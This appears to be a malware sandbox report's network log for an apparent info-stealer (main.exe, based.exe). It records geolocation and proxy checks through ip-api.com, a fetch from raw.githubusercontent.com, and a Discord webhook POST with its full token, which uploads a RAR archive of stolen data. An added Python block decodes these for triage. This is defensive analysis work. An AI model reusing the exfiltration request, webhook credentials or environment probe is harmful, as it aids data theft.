                                                                                                                                                          May 9, 2024 17:48:17.477560997 CEST44349746149.154.167.220192.168.2.5
                                                                                                                                                          May 9, 2024 17:48:17.477667093 CEST49746443192.168.2.5149.154.167.220
                                                                                                                                                          May 9, 2024 17:48:17.477689981 CEST44349746149.154.167.220192.168.2.5
                                                                                                                                                          May 9, 2024 17:48:17.477709055 CEST49746443192.168.2.5149.154.167.220
                                                                                                                                                          May 9, 2024 17:48:17.477718115 CEST44349746149.154.167.220192.168.2.5
                                                                                                                                                          May 9, 2024 17:48:17.477735043 CEST49746443192.168.2.5149.154.167.220
                                                                                                                                                          May 9, 2024 17:48:17.477745056 CEST44349746149.154.167.220192.168.2.5
                                                                                                                                                          May 9, 2024 17:48:17.477757931 CEST49746443192.168.2.5149.154.167.220
                                                                                                                                                          May 9, 2024 17:48:17.477765083 CEST44349746149.154.167.220192.168.2.5
                                                                                                                                                          May 9, 2024 17:48:17.477816105 CEST49746443192.168.2.5149.154.167.220
                                                                                                                                                          May 9, 2024 17:48:17.477827072 CEST44349746149.154.167.220192.168.2.5
                                                                                                                                                          May 9, 2024 17:48:17.477847099 CEST49746443192.168.2.5149.154.167.220
                                                                                                                                                          May 9, 2024 17:48:17.477857113 CEST44349746149.154.167.220192.168.2.5
                                                                                                                                                          May 9, 2024 17:48:17.477900982 CEST49746443192.168.2.5149.154.167.220
                                                                                                                                                          May 9, 2024 17:48:17.477910042 CEST49746443192.168.2.5149.154.167.220
                                                                                                                                                          May 9, 2024 17:48:17.477916002 CEST44349746149.154.167.220192.168.2.5
                                                                                                                                                          May 9, 2024 17:48:17.477942944 CEST49746443192.168.2.5149.154.167.220
                                                                                                                                                          May 9, 2024 17:48:17.477952003 CEST44349746149.154.167.220192.168.2.5
                                                                                                                                                          May 9, 2024 17:48:17.477966070 CEST49746443192.168.2.5149.154.167.220
                                                                                                                                                          May 9, 2024 17:48:17.477972031 CEST44349746149.154.167.220192.168.2.5
                                                                                                                                                          May 9, 2024 17:48:17.477992058 CEST49746443192.168.2.5149.154.167.220
                                                                                                                                                          May 9, 2024 17:48:17.478001118 CEST44349746149.154.167.220192.168.2.5
                                                                                                                                                          May 9, 2024 17:48:17.478060007 CEST49746443192.168.2.5149.154.167.220
                                                                                                                                                          May 9, 2024 17:48:17.478070974 CEST44349746149.154.167.220192.168.2.5
                                                                                                                                                          May 9, 2024 17:48:17.478084087 CEST49746443192.168.2.5149.154.167.220
                                                                                                                                                          May 9, 2024 17:48:17.478094101 CEST44349746149.154.167.220192.168.2.5
                                                                                                                                                          May 9, 2024 17:48:17.478111982 CEST49746443192.168.2.5149.154.167.220
                                                                                                                                                          May 9, 2024 17:48:17.478120089 CEST44349746149.154.167.220192.168.2.5
                                                                                                                                                          May 9, 2024 17:48:17.478179932 CEST49746443192.168.2.5149.154.167.220
                                                                                                                                                          May 9, 2024 17:48:17.478188038 CEST44349746149.154.167.220192.168.2.5
                                                                                                                                                          May 9, 2024 17:48:17.478209972 CEST49746443192.168.2.5149.154.167.220
                                                                                                                                                          May 9, 2024 17:48:17.478219986 CEST44349746149.154.167.220192.168.2.5
                                                                                                                                                          May 9, 2024 17:48:17.478236914 CEST49746443192.168.2.5149.154.167.220
                                                                                                                                                          May 9, 2024 17:48:17.478245020 CEST44349746149.154.167.220192.168.2.5
                                                                                                                                                          May 9, 2024 17:48:17.478260040 CEST49746443192.168.2.5149.154.167.220
                                                                                                                                                          May 9, 2024 17:48:17.478266001 CEST44349746149.154.167.220192.168.2.5
                                                                                                                                                          May 9, 2024 17:48:17.478279114 CEST49746443192.168.2.5149.154.167.220
                                                                                                                                                          May 9, 2024 17:48:17.478336096 CEST49746443192.168.2.5149.154.167.220
                                                                                                                                                          May 9, 2024 17:48:17.478357077 CEST49746443192.168.2.5149.154.167.220
                                                                                                                                                          May 9, 2024 17:48:17.478377104 CEST49746443192.168.2.5149.154.167.220
                                                                                                                                                          May 9, 2024 17:48:17.478399038 CEST49746443192.168.2.5149.154.167.220
                                                                                                                                                          May 9, 2024 17:48:17.478425026 CEST49746443192.168.2.5149.154.167.220
                                                                                                                                                          May 9, 2024 17:48:17.478439093 CEST49746443192.168.2.5149.154.167.220
                                                                                                                                                          May 9, 2024 17:48:17.478456020 CEST49746443192.168.2.5149.154.167.220
                                                                                                                                                          May 9, 2024 17:48:17.478490114 CEST49746443192.168.2.5149.154.167.220
May 9, 2024 17:48:17.478490114 CEST  49746        443        192.168.2.5      149.154.167.220
May 9, 2024 17:48:17.478535891 CEST  49746        443        192.168.2.5      149.154.167.220
May 9, 2024 17:48:17.524112940 CEST  443          49746      149.154.167.220  192.168.2.5
May 9, 2024 17:48:17.524383068 CEST  49746        443        192.168.2.5      149.154.167.220
May 9, 2024 17:48:17.524399996 CEST  443          49746      149.154.167.220  192.168.2.5
May 9, 2024 17:48:17.524422884 CEST  49746        443        192.168.2.5      149.154.167.220
May 9, 2024 17:48:17.524431944 CEST  443          49746      149.154.167.220  192.168.2.5
May 9, 2024 17:48:17.524450064 CEST  49746        443        192.168.2.5      149.154.167.220
May 9, 2024 17:48:17.524456024 CEST  443          49746      149.154.167.220  192.168.2.5
May 9, 2024 17:48:17.524468899 CEST  49746        443        192.168.2.5      149.154.167.220
May 9, 2024 17:48:17.524478912 CEST  443          49746      149.154.167.220  192.168.2.5
May 9, 2024 17:48:17.524506092 CEST  49746        443        192.168.2.5      149.154.167.220
May 9, 2024 17:48:17.524516106 CEST  443          49746      149.154.167.220  192.168.2.5
May 9, 2024 17:48:17.524523973 CEST  49746        443        192.168.2.5      149.154.167.220
May 9, 2024 17:48:17.524528027 CEST  443          49746      149.154.167.220  192.168.2.5
May 9, 2024 17:48:17.524544001 CEST  49746        443        192.168.2.5      149.154.167.220
May 9, 2024 17:48:17.524549007 CEST  443          49746      149.154.167.220  192.168.2.5
May 9, 2024 17:48:17.524564028 CEST  49746        443        192.168.2.5      149.154.167.220
May 9, 2024 17:48:17.524571896 CEST  443          49746      149.154.167.220  192.168.2.5
May 9, 2024 17:48:17.524590015 CEST  49746        443        192.168.2.5      149.154.167.220
May 9, 2024 17:48:17.524600029 CEST  443          49746      149.154.167.220  192.168.2.5
May 9, 2024 17:48:17.524615049 CEST  49746        443        192.168.2.5      149.154.167.220
May 9, 2024 17:48:17.524655104 CEST  49746        443        192.168.2.5      149.154.167.220
May 9, 2024 17:48:17.524677992 CEST  49746        443        192.168.2.5      149.154.167.220
May 9, 2024 17:48:17.524730921 CEST  49746        443        192.168.2.5      149.154.167.220
May 9, 2024 17:48:17.524736881 CEST  49746        443        192.168.2.5      149.154.167.220
May 9, 2024 17:48:17.568116903 CEST  443          49746      149.154.167.220  192.168.2.5
May 9, 2024 17:48:21.900530100 CEST  443          49746      149.154.167.220  192.168.2.5
May 9, 2024 17:48:21.900568962 CEST  443          49746      149.154.167.220  192.168.2.5
May 9, 2024 17:48:21.900686026 CEST  443          49746      149.154.167.220  192.168.2.5
May 9, 2024 17:48:21.900712967 CEST  49746        443        192.168.2.5      149.154.167.220
May 9, 2024 17:48:21.900752068 CEST  49746        443        192.168.2.5      149.154.167.220
May 9, 2024 17:48:21.903342962 CEST  49746        443        192.168.2.5      149.154.167.220
May 9, 2024 17:48:21.903949022 CEST  49739        80         192.168.2.5      208.95.112.1
May 9, 2024 17:48:22.056371927 CEST  80           49739      208.95.112.1     192.168.2.5
May 9, 2024 17:48:22.056499004 CEST  49739        80         192.168.2.5      208.95.112.1
Timestamp                            Source Port  Dest Port  Source IP        Dest IP
May 9, 2024 17:47:34.751317024 CEST  59830        53         192.168.2.5      1.1.1.1
May 9, 2024 17:47:34.905184031 CEST  53           59830      1.1.1.1          192.168.2.5
May 9, 2024 17:47:39.557771921 CEST  51677        53         192.168.2.5      1.1.1.1
May 9, 2024 17:47:39.711019039 CEST  53           51677      1.1.1.1          192.168.2.5
May 9, 2024 17:48:13.815393925 CEST  59206        53         192.168.2.5      1.1.1.1
May 9, 2024 17:48:13.970136881 CEST  53           59206      1.1.1.1          192.168.2.5
May 9, 2024 17:48:14.800735950 CEST  53534        53         192.168.2.5      1.1.1.1
May 9, 2024 17:48:14.955051899 CEST  53           53534      1.1.1.1          192.168.2.5
May 9, 2024 17:48:16.646933079 CEST  56001        53         192.168.2.5      1.1.1.1
May 9, 2024 17:48:16.799998999 CEST  53           56001      1.1.1.1          192.168.2.5
Timestamp                            Source IP    Dest IP  Trans ID  OP Code             Name                       Type            Class        DNS over HTTPS
May 9, 2024 17:47:34.751317024 CEST  192.168.2.5  1.1.1.1  0x7f4e    Standard query (0)  ip-api.com                 A (IP address)  IN (0x0001)  false
May 9, 2024 17:47:39.557771921 CEST  192.168.2.5  1.1.1.1  0xf682    Standard query (0)  raw.githubusercontent.com  A (IP address)  IN (0x0001)  false
May 9, 2024 17:48:13.815393925 CEST  192.168.2.5  1.1.1.1  0x7390    Standard query (0)  ip-api.com                 A (IP address)  IN (0x0001)  false
May 9, 2024 17:48:14.800735950 CEST  192.168.2.5  1.1.1.1  0x599e    Standard query (0)  discord.com                A (IP address)  IN (0x0001)  false
May 9, 2024 17:48:16.646933079 CEST  192.168.2.5  1.1.1.1  0xf9b9    Standard query (0)  api.telegram.org           A (IP address)  IN (0x0001)  false
Timestamp                            Source IP  Dest IP      Trans ID  Reply Code    Name                       CName  Address          Type            Class        DNS over HTTPS
May 9, 2024 17:47:34.905184031 CEST  1.1.1.1    192.168.2.5  0x7f4e    No error (0)  ip-api.com                 -      208.95.112.1     A (IP address)  IN (0x0001)  false
May 9, 2024 17:47:39.711019039 CEST  1.1.1.1    192.168.2.5  0xf682    No error (0)  raw.githubusercontent.com  -      185.199.108.133  A (IP address)  IN (0x0001)  false
May 9, 2024 17:47:39.711019039 CEST  1.1.1.1    192.168.2.5  0xf682    No error (0)  raw.githubusercontent.com  -      185.199.111.133  A (IP address)  IN (0x0001)  false
May 9, 2024 17:47:39.711019039 CEST  1.1.1.1    192.168.2.5  0xf682    No error (0)  raw.githubusercontent.com  -      185.199.110.133  A (IP address)  IN (0x0001)  false
May 9, 2024 17:47:39.711019039 CEST  1.1.1.1    192.168.2.5  0xf682    No error (0)  raw.githubusercontent.com  -      185.199.109.133  A (IP address)  IN (0x0001)  false
May 9, 2024 17:48:13.970136881 CEST  1.1.1.1    192.168.2.5  0x7390    No error (0)  ip-api.com                 -      208.95.112.1     A (IP address)  IN (0x0001)  false
May 9, 2024 17:48:14.955051899 CEST  1.1.1.1    192.168.2.5  0x599e    No error (0)  discord.com                -      162.159.138.232  A (IP address)  IN (0x0001)  false
May 9, 2024 17:48:14.955051899 CEST  1.1.1.1    192.168.2.5  0x599e    No error (0)  discord.com                -      162.159.128.233  A (IP address)  IN (0x0001)  false
May 9, 2024 17:48:14.955051899 CEST  1.1.1.1    192.168.2.5  0x599e    No error (0)  discord.com                -      162.159.137.232  A (IP address)  IN (0x0001)  false
May 9, 2024 17:48:14.955051899 CEST  1.1.1.1    192.168.2.5  0x599e    No error (0)  discord.com                -      162.159.135.232  A (IP address)  IN (0x0001)  false
May 9, 2024 17:48:14.955051899 CEST  1.1.1.1    192.168.2.5  0x599e    No error (0)  discord.com                -      162.159.136.232  A (IP address)  IN (0x0001)  false
May 9, 2024 17:48:16.799998999 CEST  1.1.1.1    192.168.2.5  0xf9b9    No error (0)  api.telegram.org           -      149.154.167.220  A (IP address)  IN (0x0001)  false
• raw.githubusercontent.com
• discord.com
• api.telegram.org
• ip-api.com
Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
0           192.168.2.5  49716        208.95.112.1    80                7796  C:\ProgramData\main.exe
Timestamp                            Bytes transferred  Direction  Data
May 9, 2024 17:47:35.148781061 CEST  65                 OUT        GET /json/ HTTP/1.1
Host: ip-api.com
Connection: Keep-Alive
May 9, 2024 17:47:35.301635027 CEST  482                IN         HTTP/1.1 200 OK
Date: Thu, 09 May 2024 15:47:34 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 305
Access-Control-Allow-Origin: *
X-Ttl: 60
X-Rl: 44
                                                                                                                                                          Data Raw: 7b 22 73 74 61 74 75 73 22 3a 22 73 75 63 63 65 73 73 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 22 63 6f 75 6e 74 72 79 43 6f 64 65 22 3a 22 55 53 22 2c 22 72 65 67 69 6f 6e 22 3a 22 43 41 22 2c 22 72 65 67 69 6f 6e 4e 61 6d 65 22 3a 22 43 61 6c 69 66 6f 72 6e 69 61 22 2c 22 63 69 74 79 22 3a 22 4c 6f 73 20 41 6e 67 65 6c 65 73 22 2c 22 7a 69 70 22 3a 22 39 30 30 36 30 22 2c 22 6c 61 74 22 3a 33 34 2e 30 35 34 34 2c 22 6c 6f 6e 22 3a 2d 31 31 38 2e 32 34 34 31 2c 22 74 69 6d 65 7a 6f 6e 65 22 3a 22 41 6d 65 72 69 63 61 2f 4c 6f 73 5f 41 6e 67 65 6c 65 73 22 2c 22 69 73 70 22 3a 22 44 61 74 61 63 61 6d 70 20 4c 69 6d 69 74 65 64 22 2c 22 6f 72 67 22 3a 22 43 64 6e 37 37 20 4c 41 58 20 43 53 32 22 2c 22 61 73 22 3a 22 41 53 36 30 30 36 38 20 44 61 74 61 63 61 6d 70 20 4c 69 6d 69 74 65 64 22 2c 22 71 75 65 72 79 22 3a 22 38 34 2e 31 37 2e 34 35 2e 31 31 30 22 7d
                                                                                                                                                          Data Ascii: {"status":"success","country":"United States","countryCode":"US","region":"CA","regionName":"California","city":"Los Angeles","zip":"90060","lat":34.0544,"lon":-118.2441,"timezone":"America/Los_Angeles","isp":"Datacamp Limited","org":"Cdn77 LAX CS2","as":"AS60068 Datacamp Limited","query":"84.17.45.110"}


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
1           192.168.2.5  49739        208.95.112.1    80                4292  C:\ProgramData\Microsoft\based.exe
Timestamp                            Bytes transferred  Direction  Data
May 9, 2024 17:48:14.125292063 CEST  116                OUT        GET /json/?fields=225545 HTTP/1.1
Host: ip-api.com
Accept-Encoding: identity
User-Agent: python-urllib3/2.2.1
May 9, 2024 17:48:14.414586067 CEST  372                IN         HTTP/1.1 200 OK
Date: Thu, 09 May 2024 15:48:13 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 195
Access-Control-Allow-Origin: *
X-Ttl: 21
X-Rl: 43
                                                                                                                                                          Data Raw: 7b 22 73 74 61 74 75 73 22 3a 22 73 75 63 63 65 73 73 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 22 72 65 67 69 6f 6e 4e 61 6d 65 22 3a 22 43 61 6c 69 66 6f 72 6e 69 61 22 2c 22 74 69 6d 65 7a 6f 6e 65 22 3a 22 41 6d 65 72 69 63 61 2f 4c 6f 73 5f 41 6e 67 65 6c 65 73 22 2c 22 72 65 76 65 72 73 65 22 3a 22 75 6e 6e 2d 38 34 2d 31 37 2d 34 35 2d 31 31 30 2e 63 64 6e 37 37 2e 63 6f 6d 22 2c 22 6d 6f 62 69 6c 65 22 3a 66 61 6c 73 65 2c 22 70 72 6f 78 79 22 3a 74 72 75 65 2c 22 71 75 65 72 79 22 3a 22 38 34 2e 31 37 2e 34 35 2e 31 31 30 22 7d
                                                                                                                                                          Data Ascii: {"status":"success","country":"United States","regionName":"California","timezone":"America/Los_Angeles","reverse":"unn-84-17-45-110.cdn77.com","mobile":false,"proxy":true,"query":"84.17.45.110"}
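
The two ip-api.com exchanges above and the Discord webhook upload later in this section can be triaged offline from what the report shows. The helper below is an added example (not Joe Sandbox code and not the malware's): it expands the numeric `fields=` mask of the second request and checks it against the JSON keys that came back, decodes the webhook path to its snowflake ID and the creation time that ID encodes, and parses the report's "Data Raw" hex of the multipart body to recover the part headers, the uploaded filename and the payload's magic bytes. The bit values for ip-api.com fields, its default mask, and the Discord snowflake epoch are taken from the public documentation of those services and are assumptions here; the `ENVIRONMENT_FIELDS` grouping is an analyst heuristic, not a finding in the report. Sample inputs marked REPORT are copied from this page (the hex is truncated after the RAR signature); note that the filename decoded from the hex is the one actually sent, whereas the page's "Data Ascii" rendering shows a generic user name in its place.

```python
"""Added triage helpers for the ip-api.com and Discord sessions in this report.
Example code, not Joe Sandbox's own. Inputs marked REPORT are copied from the page."""
import json
import re
from datetime import datetime, timezone
from typing import Optional

# ip-api.com numeric `fields=` bitmask (documented values, assumed accurate; the
# decode of 225545 below is cross-checked against the keys the server returned).
IPAPI_FIELD_BITS = {
    "country": 1, "countryCode": 2, "region": 4, "regionName": 8, "city": 16,
    "zip": 32, "lat": 64, "lon": 128, "timezone": 256, "isp": 512, "org": 1024,
    "as": 2048, "reverse": 4096, "query": 8192, "status": 16384, "message": 32768,
    "mobile": 65536, "proxy": 131072, "district": 524288, "continent": 1048576,
    "continentCode": 2097152, "asname": 4194304, "currency": 8388608,
    "hosting": 16777216, "offset": 33554432,
}
IPAPI_DEFAULT_MASK = 61439  # documented default field set when `fields` is absent (assumed)
# Fields that describe the egress network rather than its location; a client asking
# for these is probing for VPN/datacenter/sandbox egress (analyst heuristic).
ENVIRONMENT_FIELDS = {"proxy", "hosting", "mobile", "reverse"}


def decode_ipapi_fields(mask: int) -> set:
    """Expand a numeric ip-api.com `fields` mask into field names."""
    return {name for name, bit in IPAPI_FIELD_BITS.items() if mask & bit}


def check_ipapi_response(mask: int, body: str) -> dict:
    """Compare the fields requested with the keys returned and flag probing fields."""
    requested, data = decode_ipapi_fields(mask), json.loads(body)
    returned = set(data)
    return {
        "missing": requested - returned - {"message"},  # message only on status=fail
        "unexpected": returned - requested,
        "env_probe": sorted(requested & ENVIRONMENT_FIELDS),
        "proxy_flagged": bool(data.get("proxy")),
    }


WEBHOOK_RE = re.compile(r"^/api/webhooks/(\d+)/[A-Za-z0-9_-]+$")
DISCORD_EPOCH_MS = 1420070400000  # 2015-01-01T00:00:00Z (Discord snowflake epoch)


def discord_webhook_id(path: str) -> Optional[str]:
    """Webhook (snowflake) ID from a Discord webhook URL path, else None."""
    m = WEBHOOK_RE.match(path)
    return m.group(1) if m else None


def snowflake_created(snowflake: str) -> datetime:
    """Creation time stored in the top 42 bits of a Discord snowflake."""
    ms = (int(snowflake) >> 22) + DISCORD_EPOCH_MS
    return datetime.fromtimestamp(ms / 1000, tz=timezone.utc)


MAGIC = {b"Rar!\x1a\x07\x01\x00": "RAR5 archive",
         b"Rar!\x1a\x07\x00": "RAR4 archive",
         b"PK\x03\x04": "ZIP archive"}


def parse_multipart_preamble(hex_dump: str, boundary: str) -> dict:
    """Decode a 'Data Raw' hex dump of a multipart/form-data body: first part's
    headers, the filename it carries, and the magic bytes of the payload."""
    raw = bytes.fromhex(hex_dump)
    delim = b"--" + boundary.encode()
    if not raw.startswith(delim):
        raise ValueError("body does not start with the declared boundary")
    head, sep, payload = raw[len(delim):].lstrip(b"\r\n").partition(b"\r\n\r\n")
    if not sep:
        raise ValueError("part headers not terminated; dump too short")
    headers = {}
    for line in head.split(b"\r\n"):
        name, _, value = line.decode("latin-1").partition(":")
        headers[name.strip().lower()] = value.strip()
    m = re.search(r'filename="([^"]*)"', headers.get("content-disposition", ""))
    kind = next((t for sig, t in MAGIC.items() if payload.startswith(sig)), "unknown")
    return {"filename": m.group(1) if m else None,
            "content_type": headers.get("content-type"), "payload_type": kind}


# REPORT: second ip-api.com exchange (based.exe, PID 4292).
IPAPI_MASK = 225545
IPAPI_BODY = ('{"status":"success","country":"United States","regionName":"California",'
              '"timezone":"America/Los_Angeles","reverse":"unn-84-17-45-110.cdn77.com",'
              '"mobile":false,"proxy":true,"query":"84.17.45.110"}')
# REPORT: Discord webhook POST (based.exe); first bytes of the multipart body.
WEBHOOK_PATH = ("/api/webhooks/1237846362008195163/"
                "ZDvWlv-CgO7k2ie63UbKQjPqKJJV4I85cFC7RbPTP5wjqCUsjdPQ1Te7Pa_y0P8C8O0P")
BOUNDARY = "47ab1338cc3a5d235f5896f1843d1118"
BODY_HEX = (
    "2d 2d 34 37 61 62 31 33 33 38 63 63 33 61 35 64 32 33 35 66 35 38 39 36 "
    "66 31 38 34 33 64 31 31 31 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 "
    "6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 "
    "3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 72 6f 6d 65 "
    "74 68 65 75 73 2d 61 6c 66 6f 6e 73 2e 72 61 72 22 0d 0a 43 6f 6e 74 65 "
    "6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 "
    "65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a 52 61 72 21 1a 07 01 00 db d5 38 19")


def triage_samples() -> dict:
    """Run the helpers over the REPORT samples and return the findings."""
    wid = discord_webhook_id(WEBHOOK_PATH)
    return {"ipapi": check_ipapi_response(IPAPI_MASK, IPAPI_BODY),
            "webhook_id": wid,
            "webhook_created": snowflake_created(wid).strftime("%Y-%m-%d %H:%M:%S"),
            "upload": parse_multipart_preamble(BODY_HEX, BOUNDARY)}


if __name__ == "__main__":
    print(json.dumps(triage_samples(), indent=2, default=sorted))
```

Running it shows that 225545 selects exactly the eight keys the server returned (status, country, regionName, timezone, reverse, mobile, proxy, query), three of which (mobile, proxy, reverse) say nothing about location and everything about whether the sample is running behind a hosting provider; that the egress was in fact reported as `"proxy":true`; that the webhook ID was created on 2024-05-08 19:19:30 UTC, the day before this analysis; and that the uploaded "file" part is a RAR5 archive. The same `fields=` check applied with the default mask to the first (main.exe) exchange yields no missing or unexpected keys, which is the cross-check that the bit table is right.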


Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
0           192.168.2.5  49718        185.199.108.133  443               7796  C:\ProgramData\main.exe
Timestamp                Bytes transferred  Direction  Data
2024-05-09 15:47:40 UTC  108                OUT        GET /attationin/Cloud/main/Milinfo.txt HTTP/1.1
Host: raw.githubusercontent.com
Connection: Keep-Alive
2024-05-09 15:47:40 UTC  901                IN         HTTP/1.1 200 OK
Connection: close
Content-Length: 38
Cache-Control: max-age=300
Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
Content-Type: text/plain; charset=utf-8
ETag: "937f0d2f7dc6042a15459e7058c0a2c30a4d13dff2b555d7421546908fb2234f"
Strict-Transport-Security: max-age=31536000
X-Content-Type-Options: nosniff
X-Frame-Options: deny
X-XSS-Protection: 1; mode=block
X-GitHub-Request-Id: 54E8:10BA36:26F57CF:291BFAC:663CF01B
Accept-Ranges: bytes
Date: Thu, 09 May 2024 15:47:40 GMT
Via: 1.1 varnish
X-Served-By: cache-lax-kwhp1940139-LAX
X-Cache: MISS
X-Cache-Hits: 0
X-Timer: S1715269660.273154,VS0,VE133
Vary: Authorization,Accept-Encoding,Origin
Access-Control-Allow-Origin: *
Cross-Origin-Resource-Policy: cross-origin
X-Fastly-Request-ID: 992bcb0bbcf8ed4f27e6f43b1391027b0ed66a34
Expires: Thu, 09 May 2024 15:52:40 GMT
Source-Age: 0
2024-05-09 15:47:40 UTC  38                 IN         Data Raw: 32 2e 39 7c 70 70 36 71 54 75 50 48 37 63 45 4c 7a 4b 71 55 64 6f 48 75 43 66 41 32 32 67 61 4f 42 6d 4c 66 7c 0a
Data Ascii: 2.9|pp6qTuPH7cELzKqUdoHuCfA22gaOBmLf|


Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
1           192.168.2.5  49742        162.159.138.232  443               4292  C:\ProgramData\Microsoft\based.exe
Timestamp                Bytes transferred  Direction  Data
2024-05-09 15:48:15 UTC  302                OUT        POST /api/webhooks/1237846362008195163/ZDvWlv-CgO7k2ie63UbKQjPqKJJV4I85cFC7RbPTP5wjqCUsjdPQ1Te7Pa_y0P8C8O0P HTTP/1.1
Host: discord.com
Accept-Encoding: identity
Content-Length: 689192
User-Agent: python-urllib3/2.2.1
Content-Type: multipart/form-data; boundary=47ab1338cc3a5d235f5896f1843d1118
                                                                                                                                                          2024-05-09 15:48:15 UTC16384OUTData Raw: 2d 2d 34 37 61 62 31 33 33 38 63 63 33 61 35 64 32 33 35 66 35 38 39 36 66 31 38 34 33 64 31 31 31 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 72 6f 6d 65 74 68 65 75 73 2d 61 6c 66 6f 6e 73 2e 72 61 72 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a 52 61 72 21 1a 07 01 00 db d5 38 19 21 04 00 00 01 0f ff ea 43 f3 17 14 86 ba 43 c9 80 8b b9 f9 8d a0 ff ec 48 1c 00 fd d0 52 82 7a b3 f7 ac be 3f e4 38 73 47 2f 2c 1b 0b dd 06 16 24 8d e9 13 30 18 fe 99 2d 51 3b 9d 91 24 21 5d 15 98 c7 55 1c 63 80 96 57 b3 7e 7c 29 63 2c 13 d3 06 e0 98 f7 69
                                                                                                                                                          Data Ascii: --47ab1338cc3a5d235f5896f1843d1118Content-Disposition: form-data; name="file"; filename="Prometheus-user.rar"Content-Type: application/octet-streamRar!8!CCHRz?8sG/,$0-Q;$!]UcW~|)c,i
                                                                                                                                                          2024-05-09 15:48:15 UTC16384OUTData Raw: 5b 0b b8 87 9d f2 e1 9b 55 b1 c7 7a 3b 91 97 4d 63 b3 a6 9f b9 13 96 61 2d b0 46 18 58 16 f2 6e 18 1e cd f6 f0 e4 78 dc 50 ee 42 ad a1 09 9c 64 e0 ab a7 34 fe e4 bb 86 a1 eb 48 dc 99 de 22 d3 ec 47 c1 21 12 af 9c b9 2d bd 19 26 ee fb 63 ec 67 80 06 6c cb ea 3f 3f ed e8 36 47 1d d7 8d 20 03 32 ed 7d f6 88 2f 9b 69 3f 93 3a cf c9 34 90 5d 34 2d a0 89 48 3e 4e 9c eb f0 45 7c 52 42 6d 11 a5 d1 5d c7 6d 5b f8 af b6 fc 1a 75 e0 be 2b d5 b8 bc 38 b3 e4 29 dd 5a 88 33 e3 63 ce 96 5c 53 3f 6a 8b e6 98 70 1a c7 43 6c eb 82 af af d2 15 30 73 76 4c 5d d8 cd e5 41 3c 12 5b 89 c8 93 3a 61 c2 a1 93 9e 3a c0 ce 7f 36 32 45 81 15 99 66 a2 9c 25 ec 71 05 94 ca 69 ee 95 44 d4 e4 f3 8b 5f d5 fc bd fa 75 41 9d 1b 7d 06 db f2 34 6a e2 9f 5a 8e 8e f6 77 3e 02 a9 32 6b 9a 67 c5
                                                                                                                                                          Data Ascii: [Uz;Mca-FXnxPBd4H"G!-&cgl??6G 2}/i?:4]4-H>NE|RBm]m[u+8)Z3c\S?jpCl0svL]A<[:a:62Ef%qiD_uA}4jZw>2kg
                                                                                                                                                          2024-05-09 15:48:15 UTC16384OUTData Raw: d6 b9 78 00 85 7a da ca 46 4b 15 c1 b7 b7 08 ee b7 7d 8d 5e 36 19 c5 3a 5a 96 6c 03 cd d8 ed 95 70 8d 14 33 ae 5b 77 5d 08 06 e1 db 12 df a6 4b 63 27 8e 21 fd 9b 79 3d 15 91 bb ea 15 fd 85 80 61 83 f8 57 02 3b 91 10 de 2b a5 e4 50 f4 6a e3 4e e1 ef 57 03 61 9f 9f c7 92 ad dd d8 aa b0 3c 1c e5 6d c0 ff 29 da 99 c3 6d bd 68 97 f1 48 b7 8b 7b e7 2c 66 e2 20 d2 40 ec b8 2a 5b 62 b5 3f be ea 6e 54 62 89 40 ba d8 41 77 78 0c c6 18 af f0 98 ad ae c3 55 b2 3b 0b 80 b6 75 a7 15 b0 4a dd db ce a7 1a 4f 77 8e 29 1b 03 94 31 8d a2 a3 ad 62 be d5 79 f4 5d ee 1d b4 57 c0 2c 91 e9 7b a8 cf d4 10 7a 33 0d f5 e4 7a 34 73 b8 77 a8 bd 07 d4 41 e5 cd d4 42 67 e2 3b de a4 53 27 92 c3 e1 d2 5b c4 26 6a 64 d1 a7 cd 13 44 4f 69 14 a6 69 f4 6f 0d dc 4e da c6 5b 76 c4 22 5c 01 20
                                                                                                                                                          Data Ascii: xzFK}^6:Zlp3[w]Kc'!y=aW;+PjNWa<m)mhH{,f @*[b?nTb@AwxU;uJOw)1by]W,{z3z4swABg;S'[&jdDOiioN[v"\
